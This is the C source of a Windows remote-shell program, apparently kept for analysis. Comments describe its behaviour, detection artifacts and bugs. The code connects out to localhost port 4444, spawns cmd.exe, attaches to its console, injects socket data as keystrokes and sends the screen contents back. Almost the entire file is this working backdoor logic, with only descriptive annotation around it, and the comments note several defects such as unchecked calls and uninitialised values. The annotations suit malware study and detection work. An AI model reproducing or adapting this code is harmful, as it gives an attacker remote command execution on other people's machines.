/* Create by compaq */
/*
 * Behaviour summary (as written, for analysis):
 *  - connects out over TCP to the hard-coded endpoint "localhost" port "4444";
 *  - launches C:\windows\system32\cmd.exe via ShellExecuteEx with SW_SHOW
 *    (a visible console window);
 *  - walks a Toolhelp32 process snapshot, opens every process with
 *    PROCESS_ALL_ACCESS, and stops at the first whose image name looks like
 *    "cmd." (see the stride-2 comparison below);
 *  - AttachConsole()s to that process, then loops: bytes received from the
 *    socket are replayed as KEY_EVENT records into the console's input
 *    buffer, and after a 3 s sleep 6480 console-output characters are sent
 *    back over the socket, until the received text starts with "exit".
 * Observable artifacts for detection: an outbound TCP connection to port
 * 4444, a new visible cmd.exe, a process snapshot plus OpenProcess on every
 * process, and an AttachConsole to a foreign process.
 * No API return value is checked anywhere in this file.
 */
#pragma comment(lib, "ws2_32.lib")
#define _WIN32_WINNT 0x0501
/* NOTE(review): the seven header names were stripped during extraction; the
 * APIs used below presumably come from the Winsock, Windows console/shell and
 * Toolhelp32 headers — the exact list is not recoverable from this page. */
#include
#include
#include
#include
#include
#include
#include

/* Process entry point; all four WinMain parameters are unused. */
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrev, LPSTR lpCmdLine, int nCmdShow)
{
    WSADATA wsaData;
    struct sockaddr_in sockAddr;        /* declared, never used */
    SOCKET sServer;                     /* declared, never used */
    int sockAddrLen;                    /* declared, never used */
    unsigned int i,j;                   /* j is only assigned on the goto-next path below */
    SOCKET sClient;                     /* the outbound connection */
    SHELLEXECUTEINFO exeInfo;
    /* `old` and hNewScreenBuffer are never assigned; `old` is nevertheless
     * passed to SetConsoleActiveScreenBuffer() at the pl: label. */
    HANDLE hStdout,hStdin,old, hNewScreenBuffer;
    SMALL_RECT srctReadRect;            /* declared, never used */
    SMALL_RECT srctWriteRect;           /* declared, never used */
    TCHAR temp[10000];                  /* console-output scratch buffer (TCHAR elements) */
    COORD coordBufSize;                 /* declared, never used */
    COORD coordBufCoord;                /* declared, never used */
    COORD pos = {0,0};                  /* read origin within the screen buffer */
    COORD pos1;                         /* declared, never used */
    CHAR_INFO done[160];                /* declared, never used */
    SMALL_RECT srctWindow;              /* declared, never used */
    struct addrinfo *result, hints;
    /* url/port are initialised but never read; getaddrinfo() below uses the
     * string literals directly. */
    unsigned char url[100] = {"localhost"},port[10] = {"4444"};
    char temp1[10000];                  /* socket receive/send buffer (bytes) */
    unsigned char temp2[200];           /* byte copy of the first 100 received bytes */
    TCHAR file[50] = {TEXT("C:\\windows\\system32\\cmd.exe")};   /* never read; literal repeated below */
    CONSOLE_SCREEN_BUFFER_INFO csbiInfo;
    DWORD bot,bot1;                     /* declared, never used */
    DWORD dwTmp;                        /* count of input records written */
    INPUT_RECORD ir[200];               /* synthesized key events, up to 100 chars + 1 Return */
    DWORD len;                          /* count of characters read from the console */
    HANDLE hModuleSnap = INVALID_HANDLE_VALUE;   /* declared, never used */
    MODULEENTRY32 me32;                 /* declared, never used */
    HANDLE hProcessSnap;
    HANDLE hProcess;                    /* re-assigned each iteration, never closed */
    PROCESSENTRY32 pe32;

    /* --- networking: connect out to the hard-coded endpoint --- */
    WSAStartup(MAKEWORD(2,2), &wsaData);
    ZeroMemory(&hints, sizeof (hints));
    hints.ai_family = AF_INET;
    hints.ai_socktype = SOCK_STREAM;
    hints.ai_protocol = IPPROTO_TCP;
    hints.ai_flags = AI_PASSIVE;
    /* Resolve "localhost":"4444". AI_PASSIVE is a listen-side hint, yet the
     * resulting address is used with connect() below, so this is a client.
     * result is dereferenced without checking getaddrinfo()'s return. */
    getaddrinfo("localhost","4444", &hints, &result);
    sClient = socket(result->ai_family, result->ai_socktype, result->ai_protocol);
    connect(sClient,result->ai_addr, (int)result->ai_addrlen);

    /* --- spawn a visible cmd.exe --- */
    exeInfo.cbSize = sizeof(exeInfo);
    exeInfo.fMask = 0;
    exeInfo.hwnd = 0;
    exeInfo.lpVerb = 0;
    exeInfo.lpFile = TEXT("C:\\windows\\system32\\cmd.exe");
    exeInfo.lpParameters = 0;
    exeInfo.lpDirectory = 0;
    exeInfo.nShow = SW_SHOW;            /* the shell window is shown, not hidden */
    exeInfo.hInstApp = 0;
    ShellExecuteEx(&exeInfo);

    /* --- find a process whose image name starts "cmd." --- */
    hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
    pe32.dwSize = sizeof( PROCESSENTRY32 );
    Process32First( hProcessSnap, &pe32 );
    do
    {
        /* Every enumerated process is opened with full access; the handle is
         * overwritten on the next iteration and never closed. */
        hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID );
        /* Only the first 20 bytes of szExeFile are copied into temp. */
        memcpy(temp,pe32.szExeFile,20);
        /* Stride-2 comparison: this matches "cmd." only when the copied bytes
         * are UTF-16 text; whether that holds depends on the build's TCHAR
         * width, which is not visible here. If no entry matches, the loop
         * falls through and pe32 holds the last enumerated process. */
        if(temp[0] == 'c' && temp[2] == 'm' && temp[4] == 'd' && temp[6] == '.') goto outer;
    } while( Process32Next( hProcessSnap, &pe32 ) );
outer:
    /* --- attach to the target's console and take a first screen snapshot --- */
    AttachConsole(pe32.th32ProcessID);
    hStdin = GetStdHandle(STD_INPUT_HANDLE);
    hStdout = GetStdHandle(STD_OUTPUT_HANDLE);
    GetConsoleScreenBufferInfo(hStdout,&csbiInfo);
    pos.X = 0;
    /* 80 rows above the window bottom; negative when the window is shorter. */
    pos.Y = csbiInfo.srWindow.Bottom-80;
    ReadConsoleOutputCharacter(hStdout,temp,6480,pos,&len);

    /* --- command loop: socket bytes -> key events; screen buffer -> socket --- */
    for(;;)
    {
        memset(temp1,0x00,sizeof(temp1));
        memset(temp2,0x00,sizeof(temp2));
        /* The byte count returned by recv() is ignored; 100 bytes are always
         * copied, so a short or failed receive is replayed from zeroed memory. */
        recv(sClient,temp1,100,0);
        for(i=0;i<100;i++)
        {
            temp2[i] = temp1[i];
        }
        /* "exit" as the first four bytes terminates the loop. */
        if(temp2[0] == 'e' && temp2[1] == 'x' && temp2[2] == 'i' && temp2[3] == 't') goto pl;
        /* One key-down record per byte up to the first NUL. If no NUL occurs
         * within the 100 bytes the loop exits with i == 100 and j unassigned,
         * and the j+1 passed to WriteConsoleInput() below is indeterminate. */
        for(i=0;i<100;i++)
        {
            if(temp2[i] == 0x00)
            {
                j=i;
                goto next;
            }
            ir[i].EventType = KEY_EVENT;
            ir[i].Event.KeyEvent.bKeyDown = TRUE;
            ir[i].Event.KeyEvent.dwControlKeyState = 0;
            ir[i].Event.KeyEvent.uChar.UnicodeChar = temp2[i];
            ir[i].Event.KeyEvent.wRepeatCount = 1;
        }
next:
        /* Terminating record: VK_RETURN is stored in the character field. */
        ir[i].EventType = KEY_EVENT;
        ir[i].Event.KeyEvent.bKeyDown = TRUE;
        ir[i].Event.KeyEvent.dwControlKeyState = 0;
        ir[i].Event.KeyEvent.uChar.UnicodeChar = VK_RETURN;
        ir[i].Event.KeyEvent.wRepeatCount = 1;
        dwTmp = 0;
        WriteConsoleInput(hStdin, ir, j+1, &dwTmp);
        Sleep(3000);                    /* fixed 3 s wait before reading output */
        GetConsoleScreenBufferInfo(hStdout,&csbiInfo);
        pos.X = 0;
        pos.Y = csbiInfo.srWindow.Bottom-80;
        ReadConsoleOutputCharacter(hStdout,temp,6480,pos,&len);
        /* Element-wise copy from TCHAR to char; if TCHAR is wide this narrows
         * each character. Exactly 6480 bytes are sent regardless of `len`. */
        for(i=0;i<6480;i++)
        {
            temp1[i] = temp[i];
        }
        send(sClient,temp1,6480,0);
    }
pl:
    /* `old` was never assigned (see declarations). The socket, snapshot and
     * process handles are not closed and WSACleanup() is not called. */
    SetConsoleActiveScreenBuffer(old);
    return 0;
}